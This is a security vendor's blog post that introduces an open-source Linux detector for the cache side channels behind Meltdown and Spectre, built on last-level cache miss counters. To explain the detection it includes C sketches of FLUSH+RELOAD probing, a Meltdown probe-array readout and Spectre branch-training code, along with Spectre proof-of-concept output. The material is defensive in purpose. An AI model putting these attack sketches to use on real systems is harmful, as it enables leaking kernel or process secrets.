Part Two: Detecting Meltdown and Spectre by Detecting Cache Side Channels

Last week, we delivered an open source detector for some variants of the Meltdown attack and promised that we’d provide more generic detection for additional variants of Meltdown and Spectre. Today we are delivering on that promise with the introduction of our Apache-licensed cache side channel detector for Linux.

In addition to releasing that detector, we are urging a broadening of the conversation beyond mitigation to also focus on accurate and effective detection. We believe that focusing solely on expensive mitigation steps can leave many environments vulnerable while they are in the process of updating their systems. For most organizations, Linux kernel updates are among the most disruptive security updates and require a large amount of planning and time to execute. Lightweight, non-disruptive, and reliable detection can provide effective protection against newly disclosed vulnerabilities, where attackers can move much faster than defenders can.

The Case for Detection

It’s been an eventful week in many respects. Seeing the major cloud providers upgrade their entire infrastructure so seamlessly was a huge positive, even though there was a big downside, well captured in a widely shared tweet about the performance impact of the mitigations.

Some sources indicate that the performance issues in the Kernel Page Table Isolation (KPTI) mitigation are overblown, especially on recent hardware. However, other reputable sources argue that the technique does have a practical impact, depending on the application, possibly landing in the range of 5% for most workloads, with some instances being significantly higher (especially workloads that make lots of calls into the kernel).

To make matters worse, none of the existing mitigations completely address the problem. For example, Google warns that despite their exhaustive efforts, some applications, such as web browsers that execute remotely provided untrusted code, could still require their own mitigations. There is also the strong possibility that relatives of these attacks could circumvent the mitigations; side-channel attacks have not always been handled well by the industry, despite the general understanding that modern CPU architectures have significant potential for such problems.

Many environments without mitigation could, in practice, be at very low risk of a practical attack. If the workload doesn’t execute untrusted code and is fairly locked down, then the performance hit of the mitigations seems like a high cost for little to no benefit. (Note: an unmitigated machine would be at high risk of an unprivileged remote code execution vulnerability turning into full root.)

Additionally, while it was inspirational to see cloud providers able to move so quickly, there is going to be a massively long tail on upgrades. Most organizations will never be able to upgrade their fleet that quickly. Their production environments often run old software on old OSs, where any upgrade comes with a tremendous amount of risk. It’s likely more cost effective to focus on detection and response strategies, rather than full mitigation, particularly when the probability of a practical attack is low for the environment.

For Spectre and Meltdown, we believe some use cases warrant focusing on detection rather than full mitigation. First, it’s reasonable to believe that detection will often be more efficient than mitigation. For instance, our simplistic detector below uses 1-3% of a single CPU core for typical workloads, and its worst case in our testing was no higher than 10% of a single CPU core under very heavy load. This results in minimal overhead to workloads.

Additional performance overhead generally translates to additional cost for someone. However, false positives carry a cost of their own, so the effectiveness of the detection has to be considered as well.

Still, there is reason to hope that generic strategies looking for anomalies could detect a larger class of cache side channel attacks than those we currently know how to exploit. Again, as long as the detection doesn’t create a huge burden through false positives, broader detection should be valuable.

If a workload seems unlikely to be practically exploitable without other major failures, detection could certainly be preferable. However, we feel that even in cases where there’s more legitimate risk, detection is still a decent alternative, especially if a response can be automated. For instance, it should often be feasible to detect and shut down an offending process before sensitive information is fully exposed.

Additionally, where performance truly isn’t an issue, high-risk environments should be looking at a “belt-and-suspenders” approach where there is both mitigation and detection, in case the mitigation is not enough.  

Certainly, detection is critical to dealing with zero-day vulnerabilities. Assuming a mechanism like KPTI will get rid of all cache-related side channel attacks might turn out to be as wrong as assuming that ASLR with good randomization would be impossible to circumvent.

To that end, we wanted to make one of our more straightforward detection techniques available to the Linux world to help manage the problem for workloads where existing mitigations are not a good match.

Our detection strategy appears to give highly accurate results in practice, meaning low rates of both false positives and false negatives. But there are definitely trade-offs: to keep performance acceptable, we have tuned it so that small reads (under a cache line in size, like the 40-byte default for the Spectre PoC in the original paper) may go undetected under system load, and we prefer to generate a “low” severity false positive rather than miss a small read.

Please let us know if you find any cases where accuracy is suspect, as we have only tested with a handful of representative workloads.

Cache Side Channel Attacks

A common element of all the published attacks across the three vulnerability variants so far has been the use of cache timing attacks to leak the speculatively read data to the attacker. In this section, we’ll briefly explain what cache timing attacks are and how they work, to make clear why detecting them is important to detecting exploitation of these vulnerabilities.

Cache timing attacks take advantage of a few aspects of modern processors. First and foremost, the time required to access a memory address that is in the cache is significantly less (usually 80 clock cycles or fewer) than the time required to read a memory address that is not in the cache (at least 200 clock cycles). In addition, multi-core processors have a last-level cache (LLC) that is shared across all cores and is affected by both privileged and unprivileged processes. Finally, multiple memory addresses map to the same physical storage in the cache in a deterministic way. This sharing and these overloaded address mappings are what allow an unprivileged process on one CPU core to discern the contents of privileged memory that was loaded into the cache by a privileged process running on another core.
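To make the timing difference concrete, here is a minimal, illustrative sketch (ours, not part of the detector) that times a load of the same address once while it is cached and once after flushing it, using GCC/Clang x86 intrinsics. The exact cycle counts will vary by microarchitecture.

#include <stdint.h>
#include <stdio.h>
#include <x86intrin.h>   /* __rdtscp, _mm_clflush, _mm_lfence, _mm_mfence */

/* Time a single load of *addr in clock cycles using the timestamp counter. */
uint64_t time_access(volatile uint8_t *addr) {
  unsigned int aux;
  uint64_t start, end;

  _mm_lfence();               /* serialize earlier instructions */
  start = __rdtscp(&aux);
  (void)*addr;                /* the load being measured */
  end = __rdtscp(&aux);
  _mm_lfence();
  return end - start;
}

int main(void) {
  static uint8_t probe[4096];

  probe[0] = 1;               /* bring the cache line in */
  printf("cached:  %llu cycles\n", (unsigned long long)time_access(&probe[0]));

  _mm_clflush((const void *)&probe[0]);   /* evict the line */
  _mm_mfence();
  printf("flushed: %llu cycles\n", (unsigned long long)time_access(&probe[0]));
  return 0;
}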

Given these facts, cache side channel attacks work by putting the cache into a known state and then measuring the time of subsequent operations to determine how the cache’s state has changed. This all works because of the overloaded associativity between addresses and cache lines. To make this concrete, let’s start with an example: the FLUSH+RELOAD technique.


The attack described in the FLUSH+RELOAD paper by Yuval Yarom and Katrina Falkner works in four simple steps (sketched in code after the list):

  1. Flush an address that maps to a chosen cache line
  2. Wait some time for the victim process to do something
  3. Time accessing the address again
    1. If it’s slow, then the victim did not access an address mapping to that cache line
    2. If it’s fast, then the victim did access an address mapping to that cache line
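In code, those four steps look roughly like the following sketch (again ours, for illustration only; the cycle threshold is arbitrary and has to be tuned per CPU, and a real attacker would synchronize step 2 with victim activity rather than spin):

#include <stdint.h>
#include <x86intrin.h>   /* _mm_clflush, __rdtscp, _mm_lfence, _mm_mfence */

#define HIT_THRESHOLD 100   /* illustrative cycle threshold */

/* One FLUSH+RELOAD round against a single address shared with the victim.
 * Returns 1 if the victim touched the cache line while we waited, else 0. */
int flush_reload_probe(volatile uint8_t *shared_addr) {
  unsigned int aux;
  uint64_t start, delta;

  /* 1. Flush the cache line the address maps to. */
  _mm_clflush((const void *)shared_addr);
  _mm_mfence();

  /* 2. Wait for the victim process to do something. */
  for (volatile int i = 0; i < 100000; i++)
    ;

  /* 3. Time accessing the address again. */
  _mm_lfence();
  start = __rdtscp(&aux);
  (void)*shared_addr;
  delta = __rdtscp(&aux) - start;
  _mm_lfence();

  /* 4. A fast reload means the victim accessed the line; slow means it did not. */
  return delta < HIT_THRESHOLD;
}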

In the context of the original paper, the authors assumed there would be shared code, and by inferring access patterns to that shared code they were able to recover RSA keys. In the case of Meltdown, the covert channel is described in section 4.2 of the paper, and it works like this (the receiving side is sketched after the list):

  1. The attacker allocates an array of bytes in userspace and flushes it from the cache
  2. Then, using code that gets executed speculatively, the attacker reads some memory that is normally inaccessible due to page permissions (e.g. kernel memory) and stores it in a register
  3. The speculatively executed code checks a bit of that value at a given position:
    1. If it’s 1, it accesses an entry in the array from step 1
    2. If it’s 0, it doesn’t access any memory
  4. The attacker’s code times accesses to the entries in the array from step 1:
    1. If an entry is fast to access (fewer than roughly 80 clock cycles), then the bit at the inaccessible address was a 1
    2. If no entries are fast, then the bit was a 0
  5. Repeat to get rid of noise that might come from context switches
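The list above describes the channel one bit at a time; the actual Meltdown implementation generalizes it to a probe array with one page-sized slot per possible byte value. A rough, illustrative sketch of the receiving side (step 4) follows; the speculative gadget itself is omitted because it needs the exception suppression tricks described in the paper.

#include <stdint.h>
#include <x86intrin.h>

#define SLOTS          256    /* one slot per possible byte value */
#define SLOT_STRIDE    4096   /* one page per slot, to sidestep the prefetcher */
#define HIT_THRESHOLD  100    /* illustrative cycle threshold */

uint8_t probe[SLOTS * SLOT_STRIDE];   /* the attacker-controlled array from step 1 */

/* Step 4: time every probe slot.  The slot that the speculative code touched
 * reloads quickly and reveals the leaked value; -1 means nothing was cached. */
int recover_value(void) {
  for (int v = 0; v < SLOTS; v++) {
    volatile uint8_t *addr = &probe[v * SLOT_STRIDE];
    unsigned int aux;
    uint64_t start, delta;

    _mm_lfence();
    start = __rdtscp(&aux);
    (void)*addr;
    delta = __rdtscp(&aux) - start;
    _mm_lfence();

    if (delta < HIT_THRESHOLD)
      return v;
  }
  return -1;
}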

The Achilles heel of FLUSH+RELOAD is that it uses cache misses to signal 0s, which by its very nature causes LLC miss counters to increment by large margins.

In the case of Spectre, the attacker is able to read out a byte at a time by abusing a bounds-checked access in a victim function such as this one:

uint8_t temp;

void victim_function(size_t x) {
  if (x < array1_size) {
    temp &= array2[array1[x] * 512];
  }
}
After successive in-bounds calls train the branch predictor, a call with an out-of-bounds x causes the branch to be taken speculatively, which results in two out-of-bounds accesses.

The first access generates an address: the byte read out of bounds from array1. The second access uses that value as an index into array2, and this read causes a cache line to be filled. Since the out-of-bounds byte is actually the victim process’s data, determining which cache line of array2 was filled is equivalent to leaking the byte value. While this does not directly use cache misses to transmit data, it does cause a significant number of cache misses because memory is not being accessed linearly.
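For illustration, the attacker’s side of the published PoC looks roughly like the sketch below. Here array1, array1_size, array2, and victim_function are assumed to be shared with the victim exactly as in the paper’s spectre.c, and the final readout of array2 uses the same timing loop sketched in the Meltdown section.

#include <stddef.h>
#include <stdint.h>
#include <x86intrin.h>

/* Shared with the victim, as in the published PoC (declarations assumed). */
extern uint8_t array1[], array2[];
extern unsigned int array1_size;
void victim_function(size_t x);

/* Train the branch predictor with in-bounds calls, then trigger a speculative
 * out-of-bounds read.  malicious_x is the offset of the secret byte relative
 * to array1.  (The real PoC mixes training and attack calls branchlessly.) */
void leak_one_byte(size_t malicious_x) {
  /* Evict array2 so that only the speculative access can refill it. */
  for (int i = 0; i < 256; i++)
    _mm_clflush(&array2[i * 512]);

  for (int round = 0; round < 30; round++) {
    /* Flush the bound so the check resolves slowly and speculation wins. */
    _mm_clflush(&array1_size);
    _mm_mfence();

    /* Five in-bounds "training" calls, then one out-of-bounds call. */
    size_t x = (round % 6 == 5) ? malicious_x : (round % array1_size);
    victim_function(x);
  }

  /* Recover the byte by timing array2[v * 512] for each v, as in the
   * probe loop sketched earlier. */
}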

Detecting Cache Side Channels with Linux Perf

Right after the vulnerabilities were announced last week, we started discussing whether we could reliably detect their exploitation. Our own Pete Markowsky suggested that the counters for Last-Level Cache (LLC) misses might provide a strong signal that a cache side channel was being used to leak the data (as was also noticed by the researchers at Endgame). These types of side channels are used to exploit vulnerabilities like Meltdown and Spectre, and are often also utilized in exploiting other hardware-level vulnerabilities like Rowhammer.

The Linux Perf subsystem provides system and software profiling using both software and hardware performance counters, and it is the kernel’s built-in interface to Intel’s performance counters. Since we had already written our own 100% pure Go interface to Perf in our open-source Capsule8 Sensor, it was trivial to make the changes necessary to support accessing hardware-based events through it as well.

Our detection strategy for cache side channels involves setting up the LLC Loads and LLC Load Misses hardware cache counters on each logical CPU and configuring Perf to record a sample every 10,000 LLC loads. Each sample includes the logical CPU number, the active process and thread IDs, the sample time, and the cumulative counts of LLC Loads and LLC Load Misses. This is a very low-impact way to continuously calculate and monitor the cache miss rate across an entire system. In our testing, running this detection consumed an average of 3% CPU on one core, peaking at 10%, during our simulated CPU- and cache-intensive workloads.
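Our released detector does this through the Go Perf interface in the Capsule8 Sensor. Purely as an illustration of the underlying mechanism, an equivalent per-CPU setup using the raw perf_event_open(2) system call from C might look like the sketch below (event encodings are taken from the perf_event_open man page; error handling, the ring-buffer mmap, and the sample parsing loop are omitted, and opening system-wide per-CPU events requires root or a permissive perf_event_paranoid setting).

#include <linux/perf_event.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Thin wrapper: glibc provides no stub for perf_event_open(2). */
static int perf_event_open(struct perf_event_attr *attr, pid_t pid, int cpu,
                           int group_fd, unsigned long flags) {
  return (int)syscall(SYS_perf_event_open, attr, pid, cpu, group_fd, flags);
}

/* Hardware cache event encoding, per the perf_event_open(2) man page. */
#define HW_CACHE_EVENT(cache, op, result) \
  ((cache) | ((op) << 8) | ((result) << 16))

/* Open an LLC Loads sampling event (group leader) plus an LLC Load Misses
 * counter (group member) on one logical CPU, for all processes (pid = -1).
 * A sample is recorded every 10,000 LLC loads and carries both counters. */
int open_llc_group(int cpu, int *miss_fd_out) {
  struct perf_event_attr attr;

  memset(&attr, 0, sizeof(attr));
  attr.size = sizeof(attr);
  attr.type = PERF_TYPE_HW_CACHE;
  attr.config = HW_CACHE_EVENT(PERF_COUNT_HW_CACHE_LL,
                               PERF_COUNT_HW_CACHE_OP_READ,
                               PERF_COUNT_HW_CACHE_RESULT_ACCESS);
  attr.sample_period = 10000;                    /* every 10,000 LLC loads */
  attr.sample_type = PERF_SAMPLE_TID | PERF_SAMPLE_TIME |
                     PERF_SAMPLE_CPU | PERF_SAMPLE_READ;
  attr.read_format = PERF_FORMAT_GROUP;          /* loads + misses per sample */
  attr.disabled = 1;                             /* enable later via ioctl */

  int loads_fd = perf_event_open(&attr, -1, cpu, -1, 0);
  if (loads_fd < 0)
    return -1;

  memset(&attr, 0, sizeof(attr));
  attr.size = sizeof(attr);
  attr.type = PERF_TYPE_HW_CACHE;
  attr.config = HW_CACHE_EVENT(PERF_COUNT_HW_CACHE_LL,
                               PERF_COUNT_HW_CACHE_OP_READ,
                               PERF_COUNT_HW_CACHE_RESULT_MISS);

  *miss_fd_out = perf_event_open(&attr, -1, cpu, loads_fd, 0);
  return loads_fd;   /* mmap this fd to read samples from its ring buffer */
}

The miss rate for a CPU can then be computed as the change in LLC Load Misses divided by the change in LLC Loads between consecutive samples on that CPU.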

Our detector readily detects the Spectre proof-of-concept published in the original paper, as shown below:

$ sudo ./cache_side_channel
I0109 02:33:56.943214   13788 main.go:61] Starting Capsule8 cache side channel detector
I0109 02:33:56.944320   13788 main.go:109] Monitoring for cache side channels
I0109 02:33:59.609506   13788 main.go:156] cpu=4 pid=13838 tid=13838 LLCLoadMissRate=0.9551

$ ./spectre_poc
Reading 40 bytes:
Reading at malicious_x = 0xffffffffffdd75c8... Success: 0x54='T' score=2
Reading at malicious_x = 0xffffffffffdd75c9... Success: 0x68='h' score=2
Reading at malicious_x = 0xffffffffffdd75ca... Success: 0x65='e' score=2
Reading at malicious_x = 0xffffffffffdd75cb... Success: 0x20=' ' score=2
Reading at malicious_x = 0xffffffffffdd75cc... Success: 0x4D='M' score=2
Reading at malicious_x = 0xffffffffffdd75cd... Success: 0x61='a' score=2
Reading at malicious_x = 0xffffffffffdd75ce... Success: 0x67='g' score=2
Reading at malicious_x = 0xffffffffffdd75cf... Success: 0x69='i' score=2
Reading at malicious_x = 0xffffffffffdd75d0... Success: 0x63='c' score=2


Our detector becomes even more effective the more data a cache side channel transfers, so running the published PoC with a larger length specified on the command line will generate significantly noisier (in a good way) detection alerts. The more data that is transferred through the cache side channel, the stronger the signal from our detector that something malicious may be going on.

Our detector’s full source code is available under an Apache 2.0 license as an example in our open-source repository.